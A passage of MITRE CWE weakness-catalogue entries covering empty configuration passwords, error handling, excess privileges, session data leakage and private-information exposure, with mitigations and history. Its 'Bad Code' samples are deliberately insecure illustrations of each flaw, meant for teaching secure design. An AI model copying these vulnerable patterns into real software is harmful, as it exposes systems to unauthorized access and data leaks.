7 Pernicious KingdomsDouble Free
CLASPDoubly freeing memory
CERT C Secure CodingMEM00-CAllocate and free memory in the same module, at the same level of abstraction
CERT C Secure CodingMEM01-CStore a new value in pointers immediately after free()
CERT C Secure CodingMEM31-CFree dynamically allocated memory exactly once
CERT C++ Secure CodingMEM01-CPPStore a valid value in pointers immediately after deallocation
CERT C++ Secure CodingMEM31-CPPFree dynamically allocated memory exactly once
Software Fault PatternsSFP12Faulty Memory Release
+ White Box Definitions

A weakness where code path has:

1. start statement that relinquishes a dynamically allocated memory resource

2. end statement that relinquishes the dynamically allocated memory resource

+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 8: C++ Catastrophes." Page 143. McGraw-Hill. 2010.
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 7, "Double Frees", Page 379.. 1st Edition. Addison Wesley. 2006.
+ Maintenance Notes

It could be argued that Double Free would be most appropriately located as a child of "Use after Free", but "Use" and "Release" are considered to be distinct operations within vulnerability theory, therefore this is more accurately "Release of a Resource after Expiration or Release", which doesn't exist yet.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Other_Notes
2010-09-27CWE Content TeamMITREInternal
updated Relationships
2010-12-13CWE Content TeamMITREInternal
updated Observed_Examples, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships

CWE-258: Empty Password in Configuration File

Weakness ID: 258
Abstraction: Variant
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

Using an empty string as a password is insecure.
+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Access Control

Technical Impact: Gain privileges / assume identity

+ Likelihood of Exploit

Very High

+ Demonstrative Examples

Example 1

The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string.

This Java example shows a properties file with an empty password string.

(Bad Code)
Example Language: Java 
# Java Web App ResourceBundle properties file
...
webapp.ldap.username=secretUsername
webapp.ldap.password=
...

The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string.

(Bad Code)
Example Language: ASP.NET 
...
<connectionStrings>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;" providerName="System.Data.Odbc" />
</connectionStrings>
...

An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13.

+ Potential Mitigations

Phase: System Configuration

Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, names book, on a map, etc. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing letters in that word with numbers and punctuation. However, do not use "similar-looking" punctuation. For example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory254Security Features
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness VariantWeakness Variant260Password in Configuration File
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfWeakness BaseWeakness Base521Weak Password Requirements
Research Concepts1000
ChildOfCategoryCategory950SFP Secondary Cluster: Hardcoded Sensitive Data
Software Fault Pattern (SFP) Clusters (primary)888
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsPassword Management: Empty Password in Configuration File
+ References
[REF-9] John Viega and Gary McGraw. "Building Secure Software: How to Avoid Security Problems the Right Way". 1st Edition. Addison-Wesley. 2002.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2009-10-29CWE Content TeamMITREInternal
updated Other_Notes, Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships

CWE CATEGORY: Environment

Category ID: 2
Status: Draft
+ Description

Description Summary

Weaknesses in this category are typically introduced during unexpected environmental conditions.
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory933OWASP Top Ten 2013 Category A5 - Security Misconfiguration
Weaknesses in OWASP Top Ten (2013) (primary)928
ParentOfWeakness VariantWeakness Variant5J2EE Misconfiguration: Data Transmission Without Encryption
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant6J2EE Misconfiguration: Insufficient Session-ID Length
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant7J2EE Misconfiguration: Missing Custom Error Page
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant8J2EE Misconfiguration: Entity Bean Declared Remote
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant9J2EE Misconfiguration: Weak Access Permissions for EJB Methods
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant11ASP.NET Misconfiguration: Creating Debug Binary
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant12ASP.NET Misconfiguration: Missing Custom Error Page
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant13ASP.NET Misconfiguration: Password in Configuration File
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base14Compiler Removal of Code to Clear Buffers
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness ClassWeakness Class435Interaction Error
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
MemberOfViewView700Seven Pernicious Kingdoms
Seven Pernicious Kingdoms (primary)700
MemberOfViewView1003Weaknesses for Simplified Mapping of Published Vulnerabilities
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
+ Maintenance Notes

This entry is being considered for deprecation. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. It cannot be deprecated until after the CWE team has reviewed whether other CWE elements are appropriately capturing the "location" in which the weaknesses are introduced.

+ Content History
Modifications
Modification DateModifierOrganizationSource
2008-09-08CWE Content TeamMITREInternal
updated Relationships
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Maintenance_Notes, Relationships

CWE CATEGORY: Error Handling

Category ID: 388
Status: Draft
+ Description

Description Summary

This category includes weaknesses that occur when an application does not properly handle errors that occur during processing.

Extended Description

An attacker may discover this type of error, as forcing these errors can occur with a variety of corrupt input.

+ Common Consequences
ScopeEffect
Integrity
Confidentiality

Technical Impact: Read application data; Modify files or directories

Generally, the consequences of improper error handling are the disclosure of the internal workings of the application to the attacker, providing details to use in further attacks. Web applications that do not properly handle error conditions frequently generate error messages such as stack traces, detailed diagnostics, and other inner details of the application.

+ Demonstrative Examples

Example 1

In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).

(Bad Code)
Example Language: Java 
Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try {
...
}
catch (ApplicationSpecificException ase) {
logger.error("Caught: " + ase.toString());
}
}
+ Potential Mitigations

Use a standard exception handling mechanism to be sure that your application properly handles all types of processing errors. All error messages sent to the user should contain as little detail as necessary to explain what happened.

If the error was caused by unexpected and likely malicious input, it may be appropriate to send the user no error message other than a simple "could not process the request" response.

The details of the error and its cause should be recorded in a detailed diagnostic log for later analysis. Do not allow the application to throw errors up to the application container, generally the web application server.

Be sure that the container is properly configured to handle errors if you choose to let any errors propagate up to it.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory18Source Code
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory728OWASP Top Ten 2004 Category A7 - Improper Error Handling
Weaknesses in OWASP Top Ten (2004) (primary)711
ParentOfCategoryCategory389Error Conditions, Return Values, Status Codes
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base391Unchecked Error Condition
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base395Use of NullPointerException Catch to Detect NULL Pointer Dereference
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base396Declaration of Catch for Generic Exception
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base397Declaration of Throws for Generic Exception
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base544Missing Standardized Error Handling Mechanism
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base600Uncaught Exception in Servlet
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant617Reachable Assertion
Development Concepts699
ParentOfWeakness ClassWeakness Class636Not Failing Securely ('Failing Open')
Development Concepts699
ParentOfWeakness ClassWeakness Class703Improper Check or Handling of Exceptional Conditions
Development Concepts (primary)699
ParentOfWeakness ClassWeakness Class754Improper Check for Unusual or Exceptional Conditions
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness ClassWeakness Class756Missing Custom Error Page
Development Concepts (primary)699
MemberOfViewView699Development Concepts
Development Concepts (primary)699
MemberOfViewView700Seven Pernicious Kingdoms
Seven Pernicious Kingdoms (primary)700
PeerOfWeakness BaseWeakness Base619Dangling Database Cursor ('Cursor Injection')
Research Concepts1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsError Handling
OWASP Top Ten 2004A7CWE More SpecificImproper Error Handling
+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 11: Failure to Handle Errors Correctly." Page 183. McGraw-Hill. 2010.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Sean EidemillerCigitalExternal
added/updated demonstrative examples
2008-09-08CWE Content TeamMITREInternal
updated Common_Consequences, Description, Relationships, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences
2010-02-16CWE Content TeamMITREInternal
updated Relationships
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated References
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships

CWE-250: Execution with Unnecessary Privileges

Weakness ID: 250
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.

Extended Description

New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges.

Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges.

+ Time of Introduction
  • Installation
  • Architecture and Design
  • Operation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Mobile Application

+ Modes of Introduction

If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe.

+ Common Consequences
ScopeEffect
Confidentiality
Integrity
Availability
Access Control

Technical Impact: Gain privileges / assume identity; Execute unauthorized code or commands; Read application data; DoS: crash / exit / restart

An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data.

+ Likelihood of Exploit

Medium

+ Detection Methods

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

Black Box

Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.

Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users.

Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Compare binary / bytecode to application permission manifest

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host-based Vulnerability Scanners – Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host Application Interface Scanner

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Automated Static Analysis

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Configuration Checker

  • Permission Manifest Analysis

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Attack Modeling

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This code temporarily raises the program's privileges to allow creation of a new user folder.

(Bad Code)
Example Language: Python 
def makeNewUserDir(username):
if invalidUsername(username):
#avoid CWE-22 and CWE-78
print('Usernames cannot contain invalid characters')
return False
try:
raisePrivileges()
os.mkdir('/home/' + username)
lowerPrivileges()
except OSError:
print('Unable to create new user directory for user:' + username)
return False
return True

While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur.

Example 2

The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.

(Bad Code)
Example Language:
chroot(APP_HOME);
chdir("/");
FILE* data = fopen(argv[1], "r+");
...

Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced.

Example 3

This application intends to use a user's location to determine the timezone the user is in:

(Bad Code)
Example Language: Java 
locationClient = new LocationClient(this, this, this);
locationClient.connect();
Location userCurrLocation;
userCurrLocation = locationClient.getLastLocation();
setTimeZone(userCurrLocation);

This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API.

Example 4

This code uses location to determine the user's current US State location.

First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml:

(Bad Code)
Example Language: XML 
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>

During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible:

(Bad Code)
Example Language: Java 
locationClient = new LocationClient(this, this, this);
locationClient.connect();
Location userCurrLocation;
userCurrLocation = locationClient.getLastLocation();
deriveStateFromCoords(userCurrLocation);

While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in.

+ Observed Examples
ReferenceDescription
FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.
Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files.
OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.
Composite: application running with high privileges allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file.
Program does not drop privileges before calling another program, allowing code execution.
setuid root program allows creation of arbitrary files through command line argument.
Installation script installs some programs as setuid when they shouldn't be.
+ Potential Mitigations

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.250.2]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phase: Architecture and Design

Strategies: Separation of Privilege; Identify and Reduce Attack Surface

Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [R.250.2]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators.

Phase: Implementation

Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements.

Phase: Implementation

When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed.

Phase: Implementation

If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [R.250.2]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place.

Phases: Operation; System Configuration

Strategy: Environment Hardening

Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [R.250.4] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class227Improper Fulfillment of API Contract ('API Abuse')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory265Privilege / Sandbox Issues
Development Concepts699
ChildOfWeakness BaseWeakness Base269Improper Privilege Management
Research Concepts1000
ChildOfWeakness ClassWeakness Class657Violation of Secure Design Principles
Development Concepts699
Research Concepts (primary)1000
ChildOfCategoryCategory7532009 Top 25 - Porous Defenses
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory815OWASP Top Ten 2010 Category A6 - Security Misconfiguration
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory858CERT Java Secure Coding Section 13 - Serialization (SER)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8662011 Top 25 - Porous Defenses
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory901SFP Primary Cluster: Privilege
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Relationship Notes

There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsOften Misused: Privilege Management
CERT Java Secure CodingSER09-JMinimize privileges before deserializing from a privilege context
+ References
[R.250.1] Jerome H. Saltzer and Michael D. Schroeder. "The Protection of Information in Computer Systems". Proceedings of the IEEE 63. September, 1975. <http://web.mit.edu/Saltzer/www/publications/protection/>.
[R.250.2] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.250.3] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 7, "Running with Least Privilege" Page 207. 2nd Edition. Microsoft. 2002.
[R.250.4] [REF-24] NIST. "Federal Desktop Core Configuration". <http://nvd.nist.gov/fdcc/index.cfm>.
[R.250.5] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 16: Executing Code With Too Much Privilege." Page 243. McGraw-Hill. 2010.
[R.250.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Privilege Vulnerabilities", Page 477.. 1st Edition. Addison Wesley. 2006.
+ Maintenance Notes

CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The "least privilege" phrase has multiple interpretations.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-09-08CWE Content TeamMITREInternal
updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description, Maintenance_Notes
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations, References
2010-06-21CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships
2012-05-11CWE Content TeamMITREInternal
updated References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Applicable_Platforms
2014-02-18CWE Content TeamMITREInternal
updated Demonstrative_Examples
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors
Previous Entry Names
Change DatePrevious Entry Name
2008-01-30Often Misused: Privilege Management
2009-01-12Design Principle Violation: Failure to Use Least Privilege

CWE-488: Exposure of Data Element to Wrong Session

Weakness ID: 488
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.

Extended Description

Data can "bleed" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool.

In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user's data. In other words, storing user data in Servlet member fields introduces a data access race condition.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data

+ Demonstrative Examples

Example 1

The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream.

(Bad Code)
Example Language: Java 
public class GuestBook extends HttpServlet {
String name;

protected void doPost (HttpServletRequest req, HttpServletResponse res) {
name = req.getParameter("name");
...
out.println(name + ", thanks for visiting!");
}
}

While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way: Thread 1: assign "Dick" to name Thread 2: assign "Jane" to name Thread 1: print "Jane, thanks for visiting!" Thread 2: print "Jane, thanks for visiting!" Thereby showing the first user the second user's name.

+ Potential Mitigations

Phase: Architecture and Design

Protect the application's sessions from information leakage. Make sure that a session's data is not used or visible by other sessions.

Phase: Testing

Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field).

Phase: Architecture and Design

In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ChildOfCategoryCategory882CERT C++ Secure Coding Section 14 - Concurrency (CON)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory965SFP Secondary Cluster: Insecure Session Management
Software Fault Pattern (SFP) Clusters (primary)888
CanFollowWeakness BaseWeakness Base567Unsynchronized Access to Shared Data in a Multithreaded Context
Research Concepts1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsData Leaking Between Users
CERT C++ Secure CodingCON02-CPPUse lock classes for mutex management
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Description, Relationships, Other_Notes, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Relationships
2011-03-29CWE Content TeamMITREInternal
updated Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Data Leaking Between Users
2011-03-29Data Leak Between Sessions

CWE-359: Exposure of Private Information ('Privacy Violation')

Weakness ID: 359
Abstraction: Class
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software does not properly prevent private data (such as credit card numbers) from being accessed by actors who either (1) are not explicitly authorized to access the data or (2) do not have the implicit consent of the people to which the data is related.

Extended Description

Mishandling private information, such as customer passwords or Social Security numbers, can compromise user privacy and is often illegal. An exposure of private information does not necessarily prevent the software from working properly, and in fact it might be intended by the developer, but it can still be undesirable (or explicitly prohibited by law) for the people who are associated with this private information.

Privacy violations may occur when:

  1. Private user information enters the program.

  2. The data is written to an external location, such as the console, file system, or network.

Private data can enter a program in a variety of ways:

  1. Directly from the user in the form of a password or personal information

  2. Accessed from a database or other data store by the application

  3. Indirectly from a partner or other third party

Some types of private information include:

  • Government identifiers, such as Social Security Numbers

  • Contact information, such as home addresses and telephone numbers

  • Geographic location - where the user is (or was)

  • Employment history

  • Financial data - such as credit card numbers, salary, bank accounts, and debts

  • Pictures, video, or audio

  • Behavioral patterns - such as web surfing history, when certain activities are performed, etc.

  • Relationships (and types of relationships) with others - family, friends, contacts, etc.

  • Communications - e-mail addresses, private e-mail messages, SMS text messages, chat logs, etc.

  • Health - medical conditions, insurance status, prescription records

  • Credentials, such as passwords, which can be used to access other information.

Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry.

